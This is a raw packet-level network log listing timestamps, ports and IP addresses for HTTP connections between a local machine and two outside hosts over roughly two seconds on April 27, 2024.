Apr 27, 2024 02:19:08.695705891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695734024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.695909977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695969105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.695971012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.695991039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.696047068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.740609884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.740778923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.740796089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.740813017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.740854979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.740886927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.786701918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.786789894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.786839008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.786889076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.835814953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.835835934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.835985899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.835985899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.839436054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.839483023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.839518070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.839550018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.840250015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.840274096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.840291023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.840302944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.840331078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.840348959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.890161037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890248060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890321016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.890367031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890443087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890486956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.890568972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890695095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890746117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890799046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.890824080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890841007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890858889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890870094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.890908003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.890943050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.890974998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.891016960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.891025066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.891103983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.891149044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.935933113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.935973883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.935991049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.936116934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.936135054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:08.936156034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.936192989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:08.958808899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.958864927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.958931923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:08.959011078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.959011078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.959012032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:08.980905056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.007767916 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.007956982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.011356115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.011413097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.011507034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.011527061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.011562109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.011590004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.011611938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.011663914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.011691093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.011708021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.011749029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.011779070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.086452007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.086539984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.086568117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.086586952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.086688042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.086688042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.087197065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087246895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087271929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087321997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087340117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087351084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.087398052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.087600946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087619066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087645054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.087740898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087796926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.087857008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087934971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.087990999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.130928040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.131185055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.131277084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.131290913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.131314039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.131409883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.131428003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.131443024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.131459951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.131474018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.131506920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.176031113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.179007053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.179195881 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.182291031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.182308912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.182351112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.182359934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.182370901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.182413101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.182696104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.182713032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.182749987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.182751894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.182770967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.182805061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.230804920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.282246113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.282282114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.282299995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.282318115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.282443047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.282443047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.283870935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.283921003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.283960104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.284015894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.284301043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.284324884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.284352064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.285819054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.285855055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.285883904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.285932064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.286091089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.286143064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.302798986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.302866936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.302979946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.303002119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.303062916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.303092003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.325673103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.325692892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.325726032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.325756073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.325884104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.325902939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.325932026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.325963020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.350090027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.350176096 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.353189945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.353277922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.353295088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.353311062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.353328943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.353346109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.353362083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.353362083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.353362083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.353410006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.353410006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.353410006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.426318884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.426492929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.426526070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.426558971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.473278999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.473329067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.473443031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.473486900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.473488092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.476304054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.476737022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.476792097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.476793051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.476849079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.476870060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.476922035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.476937056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.476993084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.478063107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.478128910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.478209019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.478228092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.478255987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.478286028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.478295088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.478354931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.479954004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.479973078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.480006933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.480036974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.480077982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.480125904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.480145931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.480271101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.520255089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.520330906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.520406008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.520457029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.521292925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.522423983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.522485018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.524991035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.525048018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.525054932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.525068998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.525108099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.525151014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.525157928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.525197983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.525197983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.525243998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.525331020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.525378942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.574561119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.622172117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.644390106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.644555092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.647675991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.647758007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.647830963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.647905111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.668313980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.672600985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.672898054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.673098087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.693767071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.693960905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.696154118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.696216106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.696377993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.696434975 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.696533918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.696608067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.696660042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.696753025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.696758032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.696811914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.696825027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.696885109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.715641022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.715698957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.715714931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.715800047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.715836048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.715837002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.715873957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.715955019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.716002941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.716002941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.716114998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.716130972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.716167927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.716227055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.716286898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.770162106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.770241976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.770287037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.815824032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.815891027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.818886042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.818957090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.863358021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.865286112 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.865319967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.865478039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.865478039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.867491961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.867542028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.867613077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.867650032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.867881060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.867942095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.867945910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.867991924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.868007898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.868062973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.868093014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.868149042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.868426085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.868474960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.868500948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911228895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911246061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911257982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911269903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911421061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.911421061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.911454916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911468983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911480904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911509037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.911515951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911530018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.911530972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911556005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911588907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.911607027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.911664963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.965619087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.965687037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:09.965903997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:09.986357927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.986419916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:09.989106894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:09.989165068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.036241055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.036308050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.038645983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.038714886 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.038732052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.038762093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.038839102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.038892984 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.039635897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.039691925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.039714098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:10.039764881 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:10.039824963 CEST	80	49733	185.172.128.76	192.168.2.4
